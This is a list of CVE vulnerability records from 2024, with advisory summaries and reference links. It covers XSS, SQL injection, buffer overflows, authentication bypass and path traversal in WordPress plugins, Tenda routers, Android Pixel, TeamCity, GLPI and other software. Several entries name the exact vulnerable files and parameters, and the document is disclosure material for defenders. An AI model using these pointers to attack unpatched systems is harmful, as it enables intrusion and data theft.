CVE    2024    2721    Candidate    Deserialization of Untrusted Data vulnerability in Social Media Share Buttons By Sygnoos Social Media Share Buttons. This issue affects Social Media Share Buttons: from n/a through 2.1.0.    MISC:https://patchstack.com/database/vulnerability/social-media-builder/wordpress-social-media-share-buttons-plugin-2-1-0-php-object-injection-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/social-media-builder/wordpress-social-media-share-buttons-plugin-2-1-0-php-object-injection-vulnerability?_s_id=cve    Assigned (20240320)
CVE    2024    27209    Candidate    There is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27208    Candidate    There is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27207    Candidate    Exported broadcast receivers allowing malicious apps to bypass broadcast protection.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27206    Candidate    There is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27205    Candidate    There is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    27204    Candidate    In tmu_set_gov_active of tmu.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/pixel/2024-03-01   |   URL:https://source.android.com/security/bulletin/pixel/2024-03-01    Assigned (20240221)
CVE    2024    2720    Candidate    A vulnerability classified as problematic was found in Campcodes Complete Online DJ Booking System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/aboutus.php. The manipulation of the argument pagetitle leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257473 was assigned to this vulnerability.    MISC:VDB-257473 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257473   |   MISC:VDB-257473 | Campcodes Complete Online DJ Booking System aboutus.php cross site scripting   |   URL:https://vuldb.com/?id.257473   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%209.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%209.pdf    Assigned (20240320)
CVE    2024    27199    Candidate    In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible    MISC:https://www.darkreading.com/cyberattacks-data-breaches/jetbrains-teamcity-mass-exploitation-underway-rogue-accounts-thrive   |   MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240221)
CVE    2024    27198    Candidate    In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible    MISC:https://www.darkreading.com/cyberattacks-data-breaches/jetbrains-teamcity-mass-exploitation-underway-rogue-accounts-thrive   |   MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240221)
CVE    2024    27197    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Bee BeePress allows Stored XSS. This issue affects BeePress: from n/a through 6.9.8.    MISC:https://patchstack.com/database/vulnerability/beepress/wordpress-beepress-plugin-6-9-8-csrf-to-stored-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/beepress/wordpress-beepress-plugin-6-9-8-csrf-to-stored-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240221)
CVE    2024    27196    Candidate    Cross Site Scripting (XSS) vulnerability in Joel Starnes postMash – custom post order allows Reflected XSS. This issue affects postMash – custom post order: from n/a through 1.2.0.    MISC:https://patchstack.com/database/vulnerability/postmash/wordpress-postmash-custom-post-order-plugin-1-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/postmash/wordpress-postmash-custom-post-order-plugin-1-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240221)
CVE    2024    27195    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Sandi Verdev Watermark RELOADED allows Stored XSS. This issue affects Watermark RELOADED: from n/a through 1.3.5.    MISC:https://patchstack.com/database/vulnerability/watermark-reloaded/wordpress-watermark-reloaded-plugin-1-3-5-csrf-to-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/watermark-reloaded/wordpress-watermark-reloaded-plugin-1-3-5-csrf-to-xss-vulnerability?_s_id=cve    Assigned (20240221)
CVE    2024    27194    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Andrei Ivasiuc Fontific | Google Fonts allows Stored XSS. This issue affects Fontific | Google Fonts: from n/a through 0.1.6.    MISC:https://patchstack.com/database/vulnerability/fontific/wordpress-fontific-plugin-0-1-6-csrf-to-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/fontific/wordpress-fontific-plugin-0-1-6-csrf-to-xss-vulnerability?_s_id=cve    Assigned (20240221)
CVE    2024    27193    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PayU PayU India allows Reflected XSS. This issue affects PayU India: from n/a through 3.8.2.    MISC:https://patchstack.com/database/vulnerability/payu-india/wordpress-payu-india-plugin-3-8-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/payu-india/wordpress-payu-india-plugin-3-8-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240221)
CVE    2024    27192    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scott Reilly Configure SMTP allows Reflected XSS. This issue affects Configure SMTP: from n/a through 3.1.    MISC:https://patchstack.com/database/vulnerability/configure-smtp/wordpress-configure-smtp-plugin-3-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/configure-smtp/wordpress-configure-smtp-plugin-3-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240221)
CVE    2024    27190    Candidate    Missing Authorization vulnerability in Jean-David Daviet Download Media. This issue affects Download Media: from n/a through 1.4.2.    MISC:https://patchstack.com/database/vulnerability/download-media/wordpress-download-media-plugin-1-4-2-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/download-media/wordpress-download-media-plugin-1-4-2-broken-access-control-vulnerability?_s_id=cve    Assigned (20240221)
CVE    2024    2719    Candidate    A vulnerability classified as problematic has been found in Campcodes Complete Online DJ Booking System 1.0. Affected is an unknown function of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257472.    MISC:VDB-257472 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257472   |   MISC:VDB-257472 | Campcodes Complete Online DJ Booking System admin-profile.php cross site scripting   |   URL:https://vuldb.com/?id.257472   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%208.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%208.pdf    Assigned (20240320)
CVE    2024    27189    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in catchsquare WP Social Widget allows Stored XSS. This issue affects WP Social Widget: from n/a through 2.2.5.    MISC:https://patchstack.com/database/vulnerability/wp-social-widget/wordpress-wp-social-widget-plugin-2-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-social-widget/wordpress-wp-social-widget-plugin-2-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240221)
CVE    2024    2718    Candidate    A vulnerability was found in Campcodes Complete Online DJ Booking System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/booking-bwdates-reports-details.php. The manipulation of the argument fromdate leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257471.    MISC:VDB-257471 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257471   |   MISC:VDB-257471 | Campcodes Complete Online DJ Booking System booking-bwdates-reports-details.php cross site scripting   |   URL:https://vuldb.com/?id.257471   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%207.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%207.pdf    Assigned (20240320)
CVE    2024    2717    Candidate    A vulnerability was found in Campcodes Complete Online DJ Booking System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/booking-search.php. The manipulation of the argument searchdata leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257470 is the identifier assigned to this vulnerability.    MISC:VDB-257470 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257470   |   MISC:VDB-257470 | Campcodes Complete Online DJ Booking System booking-search.php cross site scripting   |   URL:https://vuldb.com/?id.257470   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%206.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%206.pdf    Assigned (20240320)
CVE    2024    2716    Candidate    A vulnerability was found in Campcodes Complete Online DJ Booking System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/contactus.php. The manipulation of the argument email leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257469 was assigned to this vulnerability.    MISC:VDB-257469 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257469   |   MISC:VDB-257469 | Campcodes Complete Online DJ Booking System contactus.php cross site scripting   |   URL:https://vuldb.com/?id.257469   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%205.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%205.pdf    Assigned (20240320)
CVE    2024    2715    Candidate    A vulnerability was found in Campcodes Complete Online DJ Booking System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/user-search.php. The manipulation of the argument searchdata leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257468.    MISC:VDB-257468 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257468   |   MISC:VDB-257468 | Campcodes Complete Online DJ Booking System user-search.php cross site scripting   |   URL:https://vuldb.com/?id.257468   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%204.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%204.pdf    Assigned (20240320)
CVE    2024    27140    Candidate    ** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Archiva. This issue affects Apache Archiva: from 2.0.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. Alternatively, you could configure a HTTP proxy in front of your Archiva instance to only forward requests that do not have malicious characters in the URL. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.    MISC:https://lists.apache.org/thread/xrn6nt904ozh3jym60c3f5hj2fb75pjy   |   URL:https://lists.apache.org/thread/xrn6nt904ozh3jym60c3f5hj2fb75pjy    Assigned (20240220)
CVE    2024    2714    Candidate    A vulnerability has been found in Campcodes Complete Online DJ Booking System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/booking-bwdates-reports-details.php. The manipulation of the argument fromdate leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257467.    MISC:VDB-257467 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257467   |   MISC:VDB-257467 | Campcodes Complete Online DJ Booking System booking-bwdates-reports-details.php sql injection   |   URL:https://vuldb.com/?id.257467   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%203.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%203.pdf    Assigned (20240320)
CVE    2024    27139    Candidate    ** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Archiva: a vulnerability in Apache Archiva allows an unauthenticated attacker to modify account data, potentially leading to account takeover. This issue affects Apache Archiva: from 2.0.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.    MISC:https://lists.apache.org/thread/qr8b7r86p1hkn0dc0q827s981kf1bgd8   |   URL:https://lists.apache.org/thread/qr8b7r86p1hkn0dc0q827s981kf1bgd8    Assigned (20240220)
CVE    2024    27138    Candidate    ** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Archiva. Apache Archiva has a setting to disable user registration, however this restriction can be bypassed. As Apache Archiva has been retired, we do not expect to release a version of Apache Archiva that fixes this issue. You are recommended to look into migrating to a different solution, or isolate your instance from any untrusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.    MISC:https://lists.apache.org/thread/070qcpclcb3sqk1hn8j5lvzohp30k1m2   |   URL:https://lists.apache.org/thread/070qcpclcb3sqk1hn8j5lvzohp30k1m2    Assigned (20240220)
CVE    2024    27135    Candidate    Improper input validation in the Pulsar Function Worker allows a malicious authenticated user to execute arbitrary Java code on the Pulsar Function worker, outside of the sandboxes designated for running user-provided functions. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.    MISC:https://lists.apache.org/thread/dh8nj2vmb2br6thjltq74lk9jxkz62wn   |   URL:https://lists.apache.org/thread/dh8nj2vmb2br6thjltq74lk9jxkz62wn   |   MISC:https://pulsar.apache.org/security/CVE-2024-27135/   |   URL:https://pulsar.apache.org/security/CVE-2024-27135/    Assigned (20240220)
CVE    2024    27133    Candidate    Insufficient sanitization in MLflow leads to XSS when running a recipe that uses an untrusted dataset. This issue leads to a client-side RCE when running the recipe in Jupyter Notebook. The vulnerability stems from lack of sanitization over dataset table fields.    MISC:https://github.com/mlflow/mlflow/pull/10893   |   URL:https://github.com/mlflow/mlflow/pull/10893   |   MISC:https://research.jfrog.com/vulnerabilities/mlflow-untrusted-dataset-xss-jfsa-2024-000631932/   |   URL:https://research.jfrog.com/vulnerabilities/mlflow-untrusted-dataset-xss-jfsa-2024-000631932/    Assigned (20240220)
CVE    2024    27132    Candidate    Insufficient sanitization in MLflow leads to XSS when running an untrusted recipe. This issue leads to a client-side RCE when running an untrusted recipe in Jupyter Notebook. The vulnerability stems from lack of sanitization over template variables.    MISC:https://github.com/mlflow/mlflow/pull/10873   |   URL:https://github.com/mlflow/mlflow/pull/10873   |   MISC:https://research.jfrog.com/vulnerabilities/mlflow-untrusted-recipe-xss-jfsa-2024-000631930/   |   URL:https://research.jfrog.com/vulnerabilities/mlflow-untrusted-recipe-xss-jfsa-2024-000631930/    Assigned (20240220)
CVE    2024    2713    Candidate    A vulnerability, which was classified as critical, was found in Campcodes Complete Online DJ Booking System 1.0. Affected is an unknown function of the file /admin/booking-search.php. The manipulation of the argument searchdata leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257466 is the identifier assigned to this vulnerability.    MISC:VDB-257466 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257466   |   MISC:VDB-257466 | Campcodes Complete Online DJ Booking System booking-search.php sql injection   |   URL:https://vuldb.com/?id.257466   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%202.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%202.pdf    Assigned (20240320)
CVE    2024    27121    Candidate    Path traversal vulnerability exists in Machine Automation Controller NJ Series and Machine Automation Controller NX Series. An arbitrary file in the affected product may be accessed or arbitrary code may be executed by processing a specially crafted request sent from a remote attacker with an administrative privilege. As for the details of the affected product names/versions, see the information provided by the vendor under [References] section.    MISC:https://jvn.jp/en/vu/JVNVU95852116/index.html   |   URL:https://jvn.jp/en/vu/JVNVU95852116/index.html   |   MISC:https://www.fa.omron.co.jp/product/security/assets/pdf/en/OMSR-2024-001_en.pdf   |   URL:https://www.fa.omron.co.jp/product/security/assets/pdf/en/OMSR-2024-001_en.pdf   |   MISC:https://www.fa.omron.co.jp/product/security/assets/pdf/ja/OMSR-2024-001_ja.pdf   |   URL:https://www.fa.omron.co.jp/product/security/assets/pdf/ja/OMSR-2024-001_ja.pdf    Assigned (20240220)
CVE    2024    2712    Candidate    A vulnerability, which was classified as critical, has been found in Campcodes Complete Online DJ Booking System 1.0. This issue affects some unknown processing of the file /admin/user-search.php. The manipulation of the argument searchdata leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257465 was assigned to this vulnerability.    MISC:VDB-257465 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257465   |   MISC:VDB-257465 | Campcodes Complete Online DJ Booking System user-search.php sql injection   |   URL:https://vuldb.com/?id.257465   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%201.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%201.pdf    Assigned (20240320)
CVE    2024    2711    Candidate    A vulnerability was found in Tenda AC10U 15.03.06.48. It has been rated as critical. Affected by this issue is the function addWifiMacFilter of the file /goform/addWifiMacFilter. The manipulation of the argument deviceMac leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257462 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257462 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257462   |   MISC:VDB-257462 | Tenda AC10U addWifiMacFilter stack-based overflow   |   URL:https://vuldb.com/?id.257462   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/addWifiMacFilter_deviceMac.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.48/more/addWifiMacFilter_deviceMac.md    Assigned (20240320)
CVE    2024    27105    Candidate    Frappe is a full-stack web application framework. Prior to versions 14.66.3 and 15.16.0, file permission can be bypassed using certain endpoints, granting less privileged users permission to delete or clone a file. Versions 14.66.3 and 15.16.0 contain a patch for this issue. No known workarounds are available.    MISC:https://github.com/frappe/frappe/security/advisories/GHSA-hq5v-q29v-7rcw   |   URL:https://github.com/frappe/frappe/security/advisories/GHSA-hq5v-q29v-7rcw    Assigned (20240219)
CVE    2024    27104    Candidate    GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. A user with rights to create and share dashboards can build a dashboard containing javascript code. Any user that will open this dashboard will be subject to an XSS attack. This issue has been patched in version 10.0.13.    MISC:https://github.com/glpi-project/glpi/commit/b409ca437864607b03c2014b9e3293b7f141af65   |   URL:https://github.com/glpi-project/glpi/commit/b409ca437864607b03c2014b9e3293b7f141af65   |   MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.13   |   URL:https://github.com/glpi-project/glpi/releases/tag/10.0.13   |   MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-prc3-cx5m-h5mj   |   URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-prc3-cx5m-h5mj    Assigned (20240219)
CVE    2024    27103    Candidate    Querybook is a Big Data Querying UI. When a user searches for their queries, datadocs, tables and lists, the search result is marked and highlighted, and this feature uses dangerouslySetInnerHTML which means that if the highlighted result has an XSS payload it will trigger. While the input to dangerouslySetInnerHTML is not sanitized for the data inside of queries which leads to an XSS vulnerability. During the "query auto-suggestion" the name of the suggested tables are set with innerHTML which leads to the XSS vulnerability. A patch to rectify this issue has been introduced in Querybook version 3.31.2.    MISC:https://github.com/pinterest/querybook/commit/449bdc9e7d679e042c3718b7ed07d2ffa3c46a8f   |   URL:https://github.com/pinterest/querybook/commit/449bdc9e7d679e042c3718b7ed07d2ffa3c46a8f   |   MISC:https://github.com/pinterest/querybook/security/advisories/GHSA-3hjm-9277-5c88   |   URL:https://github.com/pinterest/querybook/security/advisories/GHSA-3hjm-9277-5c88    Assigned (20240219)
CVE    2024    27102    Candidate    Wings is the server control plane for Pterodactyl Panel. This vulnerability impacts anyone running the affected versions of Wings. The vulnerability can potentially be used to access files and directories on the host system. The full scope of impact is exactly unknown, but reading files outside of a server's base directory (sandbox root) is possible. In order to use this exploit, an attacker must have an existing "server" allocated and controlled by Wings. Details on the exploitation of this vulnerability are embargoed until March 27th, 2024 at 18:00 UTC. In order to mitigate this vulnerability, a full rewrite of the entire server filesystem was necessary. Because of this, the size of the patch is massive, however effort was made to reduce the amount of breaking changes. Users are advised to update to version 1.11.9. There are no known workarounds for this vulnerability.    MISC:https://github.com/pterodactyl/wings/commit/d1c0ca526007113a0f74f56eba99511b4e989287   |   URL:https://github.com/pterodactyl/wings/commit/d1c0ca526007113a0f74f56eba99511b4e989287   |   MISC:https://github.com/pterodactyl/wings/security/advisories/GHSA-494h-9924-xww9   |   URL:https://github.com/pterodactyl/wings/security/advisories/GHSA-494h-9924-xww9    Assigned (20240219)
CVE    2024    27101    Candidate    SpiceDB is an open source, Google Zanzibar-inspired database for creating and managing security-critical application permissions. Integer overflow in chunking helper causes dispatching to miss elements or panic. Any SpiceDB cluster with any schema where a resource being checked has more than 65535 relationships for the same resource and subject type is affected by this problem. The CheckPermission, BulkCheckPermission, and LookupSubjects API methods are affected. This vulnerability is fixed in 1.29.2.    MISC:https://github.com/authzed/spicedb/commit/ef443c442b96909694390324a99849b0407007fe   |   URL:https://github.com/authzed/spicedb/commit/ef443c442b96909694390324a99849b0407007fe   |   MISC:https://github.com/authzed/spicedb/security/advisories/GHSA-h3m7-rqc4-7h9p   |   URL:https://github.com/authzed/spicedb/security/advisories/GHSA-h3m7-rqc4-7h9p    Assigned (20240219)
CVE    2024    27100    Candidate    Discourse is an open source platform for community discussion. In affected versions the endpoints for suspending users, silencing users and exporting CSV files weren't enforcing limits on the sizes of the parameters that they accept. This could lead to excessive resource consumption which could render an instance inoperable. A site could be disrupted by either a malicious moderator on the same site or a malicious staff member on another site in the same multisite cluster. This issue is patched in the latest stable, beta and tests-passed versions of Discourse. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/discourse/discourse/commit/8cade1e825e90a66f440e820992d43c6905f4b47   |   URL:https://github.com/discourse/discourse/commit/8cade1e825e90a66f440e820992d43c6905f4b47   |   MISC:https://github.com/discourse/discourse/security/advisories/GHSA-xq4v-qg27-gxgc   |   URL:https://github.com/discourse/discourse/security/advisories/GHSA-xq4v-qg27-gxgc    Assigned (20240219)
CVE    2024    2710    Candidate    A vulnerability was found in Tenda AC10U 15.03.06.49. It has been declared as critical. Affected by this vulnerability is the function setSchedWifi of the file /goform/openSchedWifi. The manipulation of the argument schedStartTime leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257461 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257461 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257461   |   MISC:VDB-257461 | Tenda AC10U openSchedWifi setSchedWifi stack-based overflow   |   URL:https://vuldb.com/?id.257461   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/setSchedWifi_start.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/setSchedWifi_start.md    Assigned (20240320)
CVE    2024    27099    Candidate    The uAMQP is a C library for AMQP 1.0 communication to Azure Cloud Services. When processing an incorrect `AMQP_VALUE` failed state, may cause a double free problem. This may cause a RCE. Update submodule with commit 2ca42b6e4e098af2d17e487814a91d05f6ae4987.    MISC:https://github.com/Azure/azure-uamqp-c/commit/2ca42b6e4e098af2d17e487814a91d05f6ae4987   |   URL:https://github.com/Azure/azure-uamqp-c/commit/2ca42b6e4e098af2d17e487814a91d05f6ae4987   |   MISC:https://github.com/Azure/azure-uamqp-c/security/advisories/GHSA-6rh4-fj44-v4jj   |   URL:https://github.com/Azure/azure-uamqp-c/security/advisories/GHSA-6rh4-fj44-v4jj    Assigned (20240219)
CVE    2024    27098    Candidate    GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An authenticated user can execute a SSRF based attack using Arbitrary Object Instantiation. This issue has been patched in version 10.0.13.    MISC:https://github.com/glpi-project/glpi/commit/3b6bc1b4aa1f3693b20ada3425d2de5108522484   |   URL:https://github.com/glpi-project/glpi/commit/3b6bc1b4aa1f3693b20ada3425d2de5108522484   |   MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.13   |   URL:https://github.com/glpi-project/glpi/releases/tag/10.0.13   |   MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-92x4-q9w5-837w   |   URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-92x4-q9w5-837w    Assigned (20240219)
CVE    2024    27097    Candidate    A user endpoint didn't perform filtering on an incoming parameter, which was added directly to the application log. This could lead to an attacker injecting false log entries or corrupt the log file format. This has been fixed in the CKAN versions 2.9.11 and 2.10.4. Users are advised to upgrade. Users unable to upgrade should override the `/user/reset` endpoint to filter the `id` parameter in order to exclude newlines.    MISC:https://github.com/ckan/ckan/commit/81b56c55e5e3651d7fcf9642cd5a489a9b62212c   |   URL:https://github.com/ckan/ckan/commit/81b56c55e5e3651d7fcf9642cd5a489a9b62212c   |   MISC:https://github.com/ckan/ckan/security/advisories/GHSA-8g38-3m6v-232j   |   URL:https://github.com/ckan/ckan/security/advisories/GHSA-8g38-3m6v-232j    Assigned (20240219)
CVE    2024    27096    Candidate    GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An authenticated user can exploit a SQL injection vulnerability in the search engine to extract data from the database. This issue has been patched in version 10.0.13.    MISC:https://github.com/glpi-project/glpi/commit/61a0c2302b4f633f5065358adc36058e1abc37f9   |   URL:https://github.com/glpi-project/glpi/commit/61a0c2302b4f633f5065358adc36058e1abc37f9   |   MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.13   |   URL:https://github.com/glpi-project/glpi/releases/tag/10.0.13   |   MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-2x8m-vrcm-2jqv   |   URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-2x8m-vrcm-2jqv    Assigned (20240219)
